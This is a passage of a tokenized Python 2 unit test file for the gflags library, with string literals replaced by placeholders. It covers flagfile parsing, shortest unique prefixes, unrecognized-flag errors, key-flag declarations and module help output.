fake_cmd_line . split ( '<STR_LIT:U+0020>' ) <EOL> expected_results = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' % tmp_files [ <NUM_LIT:0> ] ] <EOL> test_results = self . _ReadFlagsFromFiles ( fake_argv , False ) <EOL> self . assertEqual ( expected_results , test_results ) <EOL> def testMethod_flagfiles_6 ( self ) : <EOL> """<STR_LIT>""" <EOL> tmp_files = self . _SetupTestFiles ( ) <EOL> fake_cmd_line = ( '<STR_LIT>' <EOL> % tmp_files [ <NUM_LIT:0> ] ) <EOL> fake_argv = fake_cmd_line . split ( '<STR_LIT:U+0020>' ) <EOL> expected_results = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' % tmp_files [ <NUM_LIT:0> ] ] <EOL> test_results = self . 
_ReadFlagsFromFiles ( fake_argv , False ) <EOL> self . assertEqual ( expected_results , test_results ) <EOL> def testMethod_flagfiles_7 ( self ) : <EOL> """<STR_LIT>""" <EOL> self . flag_values . UseGnuGetOpt ( ) <EOL> tmp_files = self . _SetupTestFiles ( ) <EOL> fake_cmd_line = ( '<STR_LIT>' <EOL> % tmp_files [ <NUM_LIT:0> ] ) <EOL> fake_argv = fake_cmd_line . split ( '<STR_LIT:U+0020>' ) <EOL> expected_results = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> test_results = self . _ReadFlagsFromFiles ( fake_argv , False ) <EOL> self . assertEqual ( expected_results , test_results ) <EOL> def testMethod_flagfiles_8 ( self ) : <EOL> """<STR_LIT>""" <EOL> tmp_files = self . _SetupTestFiles ( ) <EOL> fake_cmd_line = ( '<STR_LIT>' <EOL> % tmp_files [ <NUM_LIT:0> ] ) <EOL> fake_argv = fake_cmd_line . split ( '<STR_LIT:U+0020>' ) <EOL> expected_results = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> test_results = self . _ReadFlagsFromFiles ( fake_argv , True ) <EOL> self . assertEqual ( expected_results , test_results ) <EOL> def testMethod_flagfiles_NoPermissions ( self ) : <EOL> """<STR_LIT>""" <EOL> tmp_files = self . _SetupTestFiles ( ) <EOL> fake_cmd_line = ( '<STR_LIT>' <EOL> % tmp_files [ <NUM_LIT:3> ] ) <EOL> fake_argv = fake_cmd_line . split ( '<STR_LIT:U+0020>' ) <EOL> self . assertRaises ( gflags . CantOpenFlagFileError , <EOL> self . _ReadFlagsFromFiles , fake_argv , True ) <EOL> def testMethod_flagfiles_NotFound ( self ) : <EOL> """<STR_LIT>""" <EOL> tmp_files = self . _SetupTestFiles ( ) <EOL> fake_cmd_line = ( '<STR_LIT>' <EOL> % tmp_files [ <NUM_LIT:3> ] ) <EOL> fake_argv = fake_cmd_line . split ( '<STR_LIT:U+0020>' ) <EOL> self . assertRaises ( gflags . CantOpenFlagFileError , <EOL> self . 
_ReadFlagsFromFiles , fake_argv , True ) <EOL> def test_flagfiles_user_path_expansion ( self ) : <EOL> """<STR_LIT>""" <EOL> fake_flagfile_item_style_1 = '<STR_LIT>' <EOL> fake_flagfile_item_style_2 = '<STR_LIT>' <EOL> expected_results = os . path . expanduser ( '<STR_LIT>' ) <EOL> test_results = self . flag_values . ExtractFilename ( fake_flagfile_item_style_1 ) <EOL> self . assertEqual ( expected_results , test_results ) <EOL> test_results = self . flag_values . ExtractFilename ( fake_flagfile_item_style_2 ) <EOL> self . assertEqual ( expected_results , test_results ) <EOL> def test_no_touchy_non_flags ( self ) : <EOL> """<STR_LIT>""" <EOL> fake_argv = [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> argv = self . flag_values ( fake_argv ) <EOL> self . assertEqual ( argv , fake_argv [ : <NUM_LIT:1> ] + fake_argv [ <NUM_LIT:2> : ] ) <EOL> def test_parse_flags_after_args_if_using_gnu_getopt ( self ) : <EOL> """<STR_LIT>""" <EOL> self . flag_values . UseGnuGetOpt ( ) <EOL> fake_argv = [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> argv = self . flag_values ( fake_argv ) <EOL> self . assertEqual ( argv , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def test_SetDefault ( self ) : <EOL> """<STR_LIT>""" <EOL> self . flag_values [ '<STR_LIT>' ] . SetDefault ( '<STR_LIT>' ) <EOL> self . assertEqual ( self . flag_values . UnitTestMessage1 , '<STR_LIT>' ) <EOL> self . assertEqual ( self . flag_values [ '<STR_LIT>' ] . default_as_str , <EOL> "<STR_LIT>" ) <EOL> self . flag_values ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( self . flag_values . UnitTestMessage1 , '<STR_LIT>' ) <EOL> self . flag_values [ '<STR_LIT>' ] . SetDefault ( None ) <EOL> self . assertEqual ( self . flag_values . UnitTestNumber , None ) <EOL> self . assertEqual ( self . flag_values [ '<STR_LIT>' ] . default_as_str , None ) <EOL> self . flag_values ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( self . 
flag_values . UnitTestNumber , <NUM_LIT> ) <EOL> self . flag_values [ '<STR_LIT>' ] . SetDefault ( <NUM_LIT:0> ) <EOL> self . assertEqual ( self . flag_values . UnitTestNumber , <NUM_LIT:0> ) <EOL> self . assertEqual ( self . flag_values [ '<STR_LIT>' ] . default_as_str , "<STR_LIT>" ) <EOL> self . flag_values ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( self . flag_values . UnitTestNumber , <NUM_LIT> ) <EOL> self . flag_values [ '<STR_LIT>' ] . SetDefault ( "<STR_LIT>" ) <EOL> self . assertEqual ( self . flag_values . UnitTestMessage1 , "<STR_LIT>" ) <EOL> self . assertEqual ( self . flag_values [ '<STR_LIT>' ] . default_as_str , "<STR_LIT>" ) <EOL> self . flag_values ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( self . flag_values . UnitTestMessage1 , "<STR_LIT>" ) <EOL> self . flag_values [ '<STR_LIT>' ] . SetDefault ( False ) <EOL> self . assertEqual ( self . flag_values . UnitTestBoolFlag , False ) <EOL> self . assertEqual ( self . flag_values [ '<STR_LIT>' ] . default_as_str , <EOL> "<STR_LIT>" ) <EOL> self . flag_values ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( self . flag_values . UnitTestBoolFlag , True ) <EOL> self . flag_values [ '<STR_LIT>' ] . SetDefault ( '<STR_LIT>' ) <EOL> self . assertEqual ( self . flag_values . UnitTestList , [ '<STR_LIT:4>' , '<STR_LIT:5>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( self . flag_values [ '<STR_LIT>' ] . default_as_str , "<STR_LIT>" ) <EOL> self . flag_values ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( self . flag_values . UnitTestList , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertRaises ( gflags . IllegalFlagValue , <EOL> self . flag_values [ '<STR_LIT>' ] . SetDefault , '<STR_LIT>' ) <EOL> self . assertRaises ( gflags . IllegalFlagValue , <EOL> self . flag_values . SetDefault , '<STR_LIT>' , - <NUM_LIT:1> ) <EOL> class FlagsParsingTest ( googletest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . 
flag_values = gflags . FlagValues ( ) <EOL> def testMethod_ShortestUniquePrefixes ( self ) : <EOL> """<STR_LIT>""" <EOL> gflags . DEFINE_string ( '<STR_LIT:a>' , '<STR_LIT>' , '<STR_LIT>' , flag_values = self . flag_values ) <EOL> gflags . DEFINE_string ( '<STR_LIT:abc>' , '<STR_LIT>' , '<STR_LIT>' , flag_values = self . flag_values ) <EOL> gflags . DEFINE_string ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , flag_values = self . flag_values ) <EOL> gflags . DEFINE_boolean ( '<STR_LIT>' , <NUM_LIT:0> , '<STR_LIT>' , <EOL> flag_values = self . flag_values ) <EOL> gflags . DEFINE_boolean ( '<STR_LIT>' , <NUM_LIT:0> , '<STR_LIT>' , <EOL> flag_values = self . flag_values ) <EOL> gflags . DEFINE_boolean ( '<STR_LIT>' , <NUM_LIT:0> , '<STR_LIT>' , flag_values = self . flag_values ) <EOL> gflags . DEFINE_integer ( '<STR_LIT>' , <NUM_LIT:0> , '<STR_LIT>' , flag_values = self . flag_values ) <EOL> gflags . DEFINE_boolean ( '<STR_LIT>' , <NUM_LIT:0> , '<STR_LIT>' , flag_values = self . flag_values ) <EOL> gflags . DEFINE_integer ( '<STR_LIT>' , <NUM_LIT:0> , '<STR_LIT>' , flag_values = self . flag_values ) <EOL> shorter_flags = self . flag_values . ShortestUniquePrefixes ( <EOL> self . flag_values . FlagDict ( ) ) <EOL> expected_results = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:a>' : '<STR_LIT:a>' , <EOL> '<STR_LIT:abc>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:z>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> for name , shorter in expected_results . iteritems ( ) : <EOL> self . assertEquals ( shorter_flags [ name ] , shorter ) <EOL> self . flag_values . __delattr__ ( '<STR_LIT:a>' ) <EOL> self . flag_values . __delattr__ ( '<STR_LIT:abc>' ) <EOL> self . flag_values . __delattr__ ( '<STR_LIT>' ) <EOL> self . flag_values . 
__delattr__ ( '<STR_LIT>' ) <EOL> self . flag_values . __delattr__ ( '<STR_LIT>' ) <EOL> self . flag_values . __delattr__ ( '<STR_LIT>' ) <EOL> self . flag_values . __delattr__ ( '<STR_LIT>' ) <EOL> self . flag_values . __delattr__ ( '<STR_LIT>' ) <EOL> self . flag_values . __delattr__ ( '<STR_LIT>' ) <EOL> def test_twodasharg_first ( self ) : <EOL> gflags . DEFINE_string ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> flag_values = self . flag_values ) <EOL> gflags . DEFINE_string ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> flag_values = self . flag_values ) <EOL> argv = ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> argv = self . flag_values ( argv ) <EOL> self . assertEqual ( '<STR_LIT>' , self . flag_values . twodash_name ) <EOL> self . assertEqual ( argv [ <NUM_LIT:1> ] , '<STR_LIT>' ) <EOL> def test_twodasharg_middle ( self ) : <EOL> gflags . DEFINE_string ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> flag_values = self . flag_values ) <EOL> gflags . DEFINE_string ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> flag_values = self . flag_values ) <EOL> argv = ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> argv = self . flag_values ( argv ) <EOL> self . assertEqual ( '<STR_LIT>' , self . flag_values . twodash2_name ) <EOL> self . assertEqual ( '<STR_LIT>' , self . flag_values . twodash2_blame ) <EOL> self . assertEqual ( argv [ <NUM_LIT:1> ] , '<STR_LIT>' ) <EOL> def test_onedasharg_first ( self ) : <EOL> gflags . DEFINE_string ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> flag_values = self . flag_values ) <EOL> gflags . DEFINE_string ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> flag_values = self . flag_values ) <EOL> argv = ( '<STR_LIT>' , <EOL> '<STR_LIT:->' , <EOL> '<STR_LIT>' ) <EOL> argv = self . flag_values ( argv ) <EOL> self . assertEqual ( argv [ <NUM_LIT:1> ] , '<STR_LIT:->' ) <EOL> def test_unrecognized_flags ( self ) : <EOL> gflags . 
DEFINE_string ( "<STR_LIT:name>" , "<STR_LIT>" , "<STR_LIT>" , flag_values = self . flag_values ) <EOL> try : <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . flag_values ( argv ) <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> except gflags . UnrecognizedFlag , e : <EOL> assert e . flagname == '<STR_LIT>' <EOL> assert e . flagvalue == '<STR_LIT>' <EOL> try : <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . flag_values ( argv ) <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> except gflags . UnrecognizedFlag , e : <EOL> assert e . flagname == '<STR_LIT:w>' <EOL> assert e . flagvalue == '<STR_LIT>' <EOL> try : <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . flag_values ( argv ) <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> except gflags . UnrecognizedFlag , e : <EOL> assert e . flagname == '<STR_LIT>' <EOL> assert e . flagvalue == '<STR_LIT>' <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> argv = self . flag_values ( argv ) <EOL> assert len ( argv ) == <NUM_LIT:2> , "<STR_LIT>" <EOL> assert argv [ <NUM_LIT:0> ] == '<STR_LIT>' , "<STR_LIT>" <EOL> assert argv [ <NUM_LIT:1> ] == '<STR_LIT>' , "<STR_LIT>" <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> argv = self . flag_values ( argv ) <EOL> assert len ( argv ) == <NUM_LIT:2> , "<STR_LIT>" <EOL> assert argv [ <NUM_LIT:0> ] == '<STR_LIT>' , "<STR_LIT>" <EOL> assert argv [ <NUM_LIT:1> ] == '<STR_LIT>' , "<STR_LIT>" <EOL> try : <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . flag_values ( argv ) <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> except gflags . UnrecognizedFlag , e : <EOL> assert e . flagname == '<STR_LIT>' <EOL> try : <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . 
flag_values ( argv ) <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> except gflags . UnrecognizedFlag : <EOL> assert e . flagname == '<STR_LIT>' <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> argv = self . flag_values ( argv ) <EOL> assert len ( argv ) == <NUM_LIT:2> , "<STR_LIT>" <EOL> assert argv [ <NUM_LIT:0> ] == '<STR_LIT>' , "<STR_LIT>" <EOL> assert argv [ <NUM_LIT:1> ] == '<STR_LIT>' , "<STR_LIT>" <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> argv = self . flag_values ( argv ) <EOL> assert len ( argv ) == <NUM_LIT:2> , "<STR_LIT>" <EOL> assert argv [ <NUM_LIT:0> ] == '<STR_LIT>' , "<STR_LIT>" <EOL> assert argv [ <NUM_LIT:1> ] == '<STR_LIT>' , "<STR_LIT>" <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> argv = self . flag_values ( argv ) <EOL> assert len ( argv ) == <NUM_LIT:2> , "<STR_LIT>" <EOL> assert argv [ <NUM_LIT:0> ] == '<STR_LIT>' , "<STR_LIT>" <EOL> assert argv [ <NUM_LIT:1> ] == '<STR_LIT>' , "<STR_LIT>" <EOL> try : <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . flag_values ( argv ) <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> except gflags . UnrecognizedFlag , e : <EOL> assert e . flagname == '<STR_LIT>' <EOL> try : <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . flag_values ( argv ) <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> except gflags . UnrecognizedFlag : <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> except gflags . FlagsError : <EOL> pass <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> argv = self . 
flag_values ( argv ) <EOL> assert len ( argv ) == <NUM_LIT:2> , "<STR_LIT>" <EOL> assert argv [ <NUM_LIT:0> ] == '<STR_LIT>' , "<STR_LIT>" <EOL> assert argv [ <NUM_LIT:1> ] == '<STR_LIT>' , "<STR_LIT>" <EOL> class NonGlobalFlagsTest ( googletest . TestCase ) : <EOL> def test_nonglobal_flags ( self ) : <EOL> """<STR_LIT>""" <EOL> nonglobal_flags = gflags . FlagValues ( ) <EOL> gflags . DEFINE_string ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , nonglobal_flags ) <EOL> argv = ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> argv = nonglobal_flags ( argv ) <EOL> assert len ( argv ) == <NUM_LIT:2> , "<STR_LIT>" <EOL> assert argv [ <NUM_LIT:0> ] == '<STR_LIT>' , "<STR_LIT>" <EOL> assert argv [ <NUM_LIT:1> ] == '<STR_LIT>' , "<STR_LIT>" <EOL> assert nonglobal_flags [ '<STR_LIT>' ] . value == '<STR_LIT>' <EOL> def test_unrecognized_nonglobal_flags ( self ) : <EOL> """<STR_LIT>""" <EOL> nonglobal_flags = gflags . FlagValues ( ) <EOL> argv = ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> try : <EOL> argv = nonglobal_flags ( argv ) <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> except gflags . UnrecognizedFlag , e : <EOL> assert e . flagname == '<STR_LIT>' <EOL> pass <EOL> argv = ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> argv = nonglobal_flags ( argv ) <EOL> assert len ( argv ) == <NUM_LIT:1> , "<STR_LIT>" <EOL> assert argv [ <NUM_LIT:0> ] == '<STR_LIT>' , "<STR_LIT>" <EOL> def test_create_flag_errors ( self ) : <EOL> e = gflags . FlagsError ( ) <EOL> e = gflags . FlagsError ( "<STR_LIT:message>" ) <EOL> e = gflags . DuplicateFlag ( ) <EOL> e = gflags . DuplicateFlag ( "<STR_LIT:message>" ) <EOL> e = gflags . IllegalFlagValue ( ) <EOL> e = gflags . IllegalFlagValue ( "<STR_LIT:message>" ) <EOL> e = gflags . UnrecognizedFlag ( ) <EOL> e = gflags . UnrecognizedFlag ( "<STR_LIT:message>" ) <EOL> def testFlagValuesDelAttr ( self ) : <EOL> """<STR_LIT>""" <EOL> default_value = '<STR_LIT>' <EOL> flag_values = gflags . FlagValues ( ) <EOL> gflags . 
DEFINE_string ( '<STR_LIT>' , default_value , '<STR_LIT>' , <EOL> flag_values = flag_values ) <EOL> self . assertEquals ( flag_values . delattr_foo , default_value ) <EOL> flag_obj = flag_values [ '<STR_LIT>' ] <EOL> self . assertTrue ( flag_values . _FlagIsRegistered ( flag_obj ) ) <EOL> del flag_values . delattr_foo <EOL> self . assertFalse ( '<STR_LIT>' in flag_values . FlagDict ( ) ) <EOL> self . assertFalse ( flag_values . _FlagIsRegistered ( flag_obj ) ) <EOL> gflags . DEFINE_integer ( '<STR_LIT>' , <NUM_LIT:3> , '<STR_LIT>' , <EOL> flag_values = flag_values ) <EOL> del flag_values . delattr_foo <EOL> self . assertFalse ( '<STR_LIT>' in flag_values . RegisteredFlags ( ) ) <EOL> gflags . DEFINE_string ( '<STR_LIT>' , default_value , '<STR_LIT>' , <EOL> short_name = '<STR_LIT>' , flag_values = flag_values ) <EOL> flag_obj = flag_values [ '<STR_LIT>' ] <EOL> self . assertTrue ( flag_values . _FlagIsRegistered ( flag_obj ) ) <EOL> del flag_values . x5 <EOL> self . assertTrue ( flag_values . _FlagIsRegistered ( flag_obj ) ) <EOL> del flag_values . delattr_bar <EOL> self . assertFalse ( flag_values . _FlagIsRegistered ( flag_obj ) ) <EOL> gflags . DEFINE_string ( '<STR_LIT>' , default_value , '<STR_LIT>' , <EOL> short_name = '<STR_LIT>' , flag_values = flag_values ) <EOL> flag_obj = flag_values [ '<STR_LIT>' ] <EOL> self . assertTrue ( flag_values . _FlagIsRegistered ( flag_obj ) ) <EOL> del flag_values . delattr_bar <EOL> self . assertTrue ( flag_values . _FlagIsRegistered ( flag_obj ) ) <EOL> del flag_values . x5 <EOL> self . assertFalse ( flag_values . _FlagIsRegistered ( flag_obj ) ) <EOL> self . assertFalse ( '<STR_LIT>' in flag_values . RegisteredFlags ( ) ) <EOL> self . assertFalse ( '<STR_LIT>' in flag_values . RegisteredFlags ( ) ) <EOL> class KeyFlagsTest ( googletest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . flag_values = gflags . 
FlagValues ( ) <EOL> def _GetNamesOfDefinedFlags ( self , module , flag_values ) : <EOL> """<STR_LIT>""" <EOL> return [ f . name for f in flag_values . _GetFlagsDefinedByModule ( module ) ] <EOL> def _GetNamesOfKeyFlags ( self , module , flag_values ) : <EOL> """<STR_LIT>""" <EOL> return [ f . name for f in flag_values . _GetKeyFlagsForModule ( module ) ] <EOL> def _AssertListsHaveSameElements ( self , list_1 , list_2 ) : <EOL> list_1 = list ( list_1 ) <EOL> list_1 . sort ( ) <EOL> list_2 = list ( list_2 ) <EOL> list_2 . sort ( ) <EOL> self . assertListEqual ( list_1 , list_2 ) <EOL> def testKeyFlags ( self ) : <EOL> self . assertListEqual ( self . _GetNamesOfKeyFlags ( module_foo , self . flag_values ) , <EOL> [ ] ) <EOL> self . assertListEqual ( self . _GetNamesOfKeyFlags ( module_bar , self . flag_values ) , <EOL> [ ] ) <EOL> self . assertListEqual ( self . _GetNamesOfDefinedFlags ( module_foo , <EOL> self . flag_values ) , <EOL> [ ] ) <EOL> self . assertListEqual ( self . _GetNamesOfDefinedFlags ( module_bar , <EOL> self . flag_values ) , <EOL> [ ] ) <EOL> module_foo . DefineFlags ( flag_values = self . flag_values ) <EOL> try : <EOL> for module in [ module_foo , module_bar ] : <EOL> self . _AssertListsHaveSameElements ( <EOL> self . flag_values . _GetFlagsDefinedByModule ( module ) , <EOL> self . flag_values . _GetKeyFlagsForModule ( module ) ) <EOL> self . _AssertListsHaveSameElements ( <EOL> self . _GetNamesOfDefinedFlags ( module , self . flag_values ) , <EOL> module . NamesOfDefinedFlags ( ) ) <EOL> module_foo . DeclareKeyFlags ( flag_values = self . flag_values ) <EOL> self . _AssertListsHaveSameElements ( <EOL> self . _GetNamesOfDefinedFlags ( module_foo , self . flag_values ) , <EOL> module_foo . NamesOfDefinedFlags ( ) ) <EOL> self . _AssertListsHaveSameElements ( <EOL> self . _GetNamesOfKeyFlags ( module_foo , self . flag_values ) , <EOL> module_foo . NamesOfDeclaredKeyFlags ( ) ) <EOL> module_foo . DeclareExtraKeyFlags ( flag_values = self . 
flag_values ) <EOL> self . _AssertListsHaveSameElements ( <EOL> self . _GetNamesOfKeyFlags ( module_foo , self . flag_values ) , <EOL> module_foo . NamesOfDeclaredKeyFlags ( ) + <EOL> module_foo . NamesOfDeclaredExtraKeyFlags ( ) ) <EOL> finally : <EOL> module_foo . RemoveFlags ( flag_values = self . flag_values ) <EOL> def testKeyFlagsWithNonDefaultFlagValuesObject ( self ) : <EOL> fv = gflags . FlagValues ( ) <EOL> self . assertListEqual ( <EOL> self . _GetNamesOfKeyFlags ( module_bar , fv ) , <EOL> [ ] ) <EOL> self . assertListEqual ( <EOL> self . _GetNamesOfDefinedFlags ( module_bar , fv ) , <EOL> [ ] ) <EOL> module_bar . DefineFlags ( flag_values = fv ) <EOL> self . _AssertListsHaveSameElements ( <EOL> fv . _GetFlagsDefinedByModule ( module_bar ) , <EOL> fv . _GetKeyFlagsForModule ( module_bar ) ) <EOL> self . _AssertListsHaveSameElements ( <EOL> self . _GetNamesOfDefinedFlags ( module_bar , fv ) , <EOL> module_bar . NamesOfDefinedFlags ( ) ) <EOL> main_module = gflags . _GetMainModule ( ) <EOL> names_of_flags_defined_by_bar = module_bar . NamesOfDefinedFlags ( ) <EOL> flag_name_0 = names_of_flags_defined_by_bar [ <NUM_LIT:0> ] <EOL> flag_name_2 = names_of_flags_defined_by_bar [ <NUM_LIT:2> ] <EOL> gflags . DECLARE_key_flag ( flag_name_0 , flag_values = fv ) <EOL> self . _AssertListsHaveSameElements ( <EOL> self . _GetNamesOfKeyFlags ( main_module , fv ) , <EOL> [ flag_name_0 ] ) <EOL> gflags . DECLARE_key_flag ( flag_name_2 , flag_values = fv ) <EOL> self . _AssertListsHaveSameElements ( <EOL> self . _GetNamesOfKeyFlags ( main_module , fv ) , <EOL> [ flag_name_0 , flag_name_2 ] ) <EOL> gflags . DECLARE_key_flag ( '<STR_LIT>' , flag_values = fv ) <EOL> self . _AssertListsHaveSameElements ( <EOL> self . _GetNamesOfKeyFlags ( main_module , fv ) , <EOL> [ flag_name_0 , flag_name_2 , '<STR_LIT>' ] ) <EOL> gflags . ADOPT_module_key_flags ( module_bar , fv ) <EOL> self . _AssertListsHaveSameElements ( <EOL> self . 
_GetNamesOfKeyFlags ( main_module , fv ) , <EOL> names_of_flags_defined_by_bar + [ '<STR_LIT>' ] ) <EOL> gflags . ADOPT_module_key_flags ( gflags , flag_values = fv ) <EOL> self . _AssertListsHaveSameElements ( <EOL> self . _GetNamesOfKeyFlags ( main_module , fv ) , <EOL> names_of_flags_defined_by_bar + [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def testMainModuleHelpWithKeyFlags ( self ) : <EOL> expected_help = '<STR_LIT>' <EOL> self . assertMultiLineEqual ( expected_help , self . flag_values . MainModuleHelp ( ) ) <EOL> gflags . DEFINE_integer ( '<STR_LIT>' , <NUM_LIT:1> , <EOL> '<STR_LIT>' , <EOL> flag_values = self . flag_values ) <EOL> try : <EOL> main_module_int_fg_help = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> expected_help += "<STR_LIT>" % ( sys . argv [ <NUM_LIT:0> ] , main_module_int_fg_help ) <EOL> self . assertMultiLineEqual ( expected_help , <EOL> self . flag_values . MainModuleHelp ( ) ) <EOL> gflags . DECLARE_key_flag ( '<STR_LIT>' , flag_values = self . flag_values ) <EOL> self . assertMultiLineEqual ( expected_help , <EOL> self . flag_values . MainModuleHelp ( ) ) <EOL> module_foo . DefineFlags ( flag_values = self . flag_values ) <EOL> self . assertMultiLineEqual ( expected_help , <EOL> self . flag_values . MainModuleHelp ( ) ) <EOL> gflags . DECLARE_key_flag ( '<STR_LIT>' , flag_values = self . flag_values ) <EOL> tmod_foo_bool_help = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> expected_help += "<STR_LIT:\n>" + tmod_foo_bool_help <EOL> self . assertMultiLineEqual ( expected_help , <EOL> self . flag_values . MainModuleHelp ( ) ) <EOL> gflags . DECLARE_key_flag ( '<STR_LIT>' , flag_values = self . flag_values ) <EOL> tmod_bar_z_help = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> expected_help = ( "<STR_LIT>" % <EOL> ( sys . argv [ <NUM_LIT:0> ] , <EOL> main_module_int_fg_help , <EOL> tmod_bar_z_help , <EOL> tmod_foo_bool_help ) ) <EOL> self . assertMultiLineEqual ( self . flag_values . 
MainModuleHelp ( ) , <EOL> expected_help ) <EOL> finally : <EOL> self . flag_values . __delattr__ ( '<STR_LIT>' ) <EOL> module_foo . RemoveFlags ( flag_values = self . flag_values ) <EOL> def test_ADOPT_module_key_flags ( self ) : <EOL> self . assertRaises ( gflags . FlagsError , <EOL> gflags . ADOPT_module_key_flags , <EOL> '<STR_LIT>' ) <EOL> class GetCallingModuleTest ( googletest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_GetCallingModule ( self ) : <EOL> self . assertEqual ( gflags . _GetCallingModule ( ) , sys . argv [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( <EOL> module_foo . GetModuleName ( ) , <EOL> '<STR_LIT>' ) <EOL> self . assertEqual ( <EOL> module_bar . GetModuleName ( ) , <EOL> '<STR_LIT>' ) <EOL> code = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> exec code <EOL> exec code in { } <EOL> exec code in dict ( vars ( self ) ) <EOL> global_dict = { } <EOL> exec code in global_dict <EOL> self . assertEqual ( global_dict [ '<STR_LIT>' ] , <EOL> sys . argv [ 